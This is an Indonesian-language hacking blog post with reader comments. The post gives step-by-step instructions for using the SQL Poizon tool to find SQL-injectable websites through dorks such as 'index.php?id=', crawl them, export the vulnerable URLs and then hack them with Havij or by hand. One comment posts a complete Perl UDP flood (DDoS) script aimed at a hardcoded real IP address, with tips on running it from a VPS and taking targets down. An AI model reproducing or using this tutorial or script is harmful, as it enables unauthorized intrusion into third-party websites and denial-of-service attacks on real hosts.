Setelah kita mengetahui cara melakukan sql injection dengan havij, kali ini saya mau bahas tool yang gak kalah keren nih. Namanya adalah SQL Poizon, jadi fungsi dari tool ini adalah untuk menemukan celah dalam websiste dengan dork yang udah tersedia di dalam tool ini.Jadi pekerjaan kita mencari target bakal lebih cepat dengan menggunakan sql poizon.  Untuk lebih jelasnya simak tutorial dibawah ini🙂

Step 1: Download SQL Poizon Software

Step 2: Buka Sql Poizon v1.1 – The Exploit Scanner.exe

website hacking, database hacking

Step 3: Seperti terlihat dalam gambar, di dalam tool ini sudah terdapat beberapa dork. Dalam contoh ini kita gunakan dork PHP , yaitu index.php?id=. Setelah memilih dork, kita klik scan untuk melihat hasil dari dork php tadi.

website hacking, database hacking

Step 4: Setelah kita menemukan target, kita bisa gunakan Sqli Crawler. Caranya kita tinggal klik kanan pada target kita pilih “Send to Sqli Crawler -> All”

website hacking, database hacking

Step 5: Pada tab Sqli Cralwer tab, kita tinggal klik Crawl untuk memastikan manakah website yang bisa kita hack dengan sql injection.

website hacking, database hacking

Step 6: Setelah ketemu target yang vuln, kita bisa klik export result untuk menyimpan daftar url yang vuln🙂

website hacking, database hacking

Nah kalo udah ketemu web yang vuln kan kita bisa langsung eksekusi, bisa kita hack lakukan SQL Injection secara manual atau bisa juga kita gunakan tool havij untuk SQLi. Oke deh sekian dulu tutorial kali ini, jangan lupa like fp Portal Hacker untuk mendapatkan update postingan terbaru🙂

sumber

Comments
  1. NARTO says:

    MASIH BINGUNG APA FUNSI DAN MAKSUD DARI SQL POZION

  2. Anonymous_INA says:

    gan koq ane buka sql poisonnya adada tulusan gini ya??? “the application failed to initialize properly (0xc0000135). click ok to terminate the application”

  3. Szeto Al Khalid says:

    bagaimana cara menyembunyikan alamat IP?

  4. scannya lama bgt gan ?

  5. Ridho Fikri says:

    Thanks Kk Saya Coba Dulu,, Do’in semoga sukses🙂

  6. This is Interesting Article for me… Thanks u ! Thanks All Indonesian Hackers !
    I’am So Proudly YOU !

  7. nexxus says:

    hmmm lebih simple ya dari pada menggunakan google secara manual

  8. gan, ada metode DDOS.. coba di pake ajaaa

  9. AbrorTjg says:

    gan, mau tanya ni kalo mencari celah berdasrkan alamat website giman??
    soalnya saya liat di artikel ni pencarian celah berdasarkan dork bukan alamt website..

  10. a says:

    #!/usr/bin/perl START SCRIPT

    print q{

    };

    use Socket;
    use strict;

    my ($ip) = “173.214.183.70”;
    my ($port) = 0;
    my ($size) = 0;
    my ($time) = 0;

    my ($iaddr,$endtime,$psize,$pport);

    $iaddr = inet_aton(“$ip”) or die “Cannot resolve hostname $ip\n”;
    $endtime = time() + ($time ? $time : 1000000);

    socket(flood, PF_INET, SOCK_DGRAM, 17);

    print “Flooding $ip ” . ($port ? $port : “random”) . ” port with ” .
    ($size ? “$size-byte” : “random size”) . ” packets” .
    ($time ? ” for $time seconds” : “”) . “\n”;

    for (;time() <= $endtime;) {
    $psize = $size ? $size : int(rand(1024-64)+64) ;
    $pport = $port ? $port : int(rand(65500))+1;

    send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94wRAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumuswaraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwXfjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73uGIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHYZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));

    print ("$ip:$pport packet size: $psize\n");
    }

    ddos perl😉

    install perl
    jalankan dengan perl😉
    nb: sebaiknya gunakan dengan bijak, untuk keamanan gunakan vps, pengiriman data terantung bandiwth, terakhir nyoba, bandwith 20gb taret langsung down ^_^, jangan lupa ganti ip target🙂

Silakan Komentar Jika Kurang Jelas

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s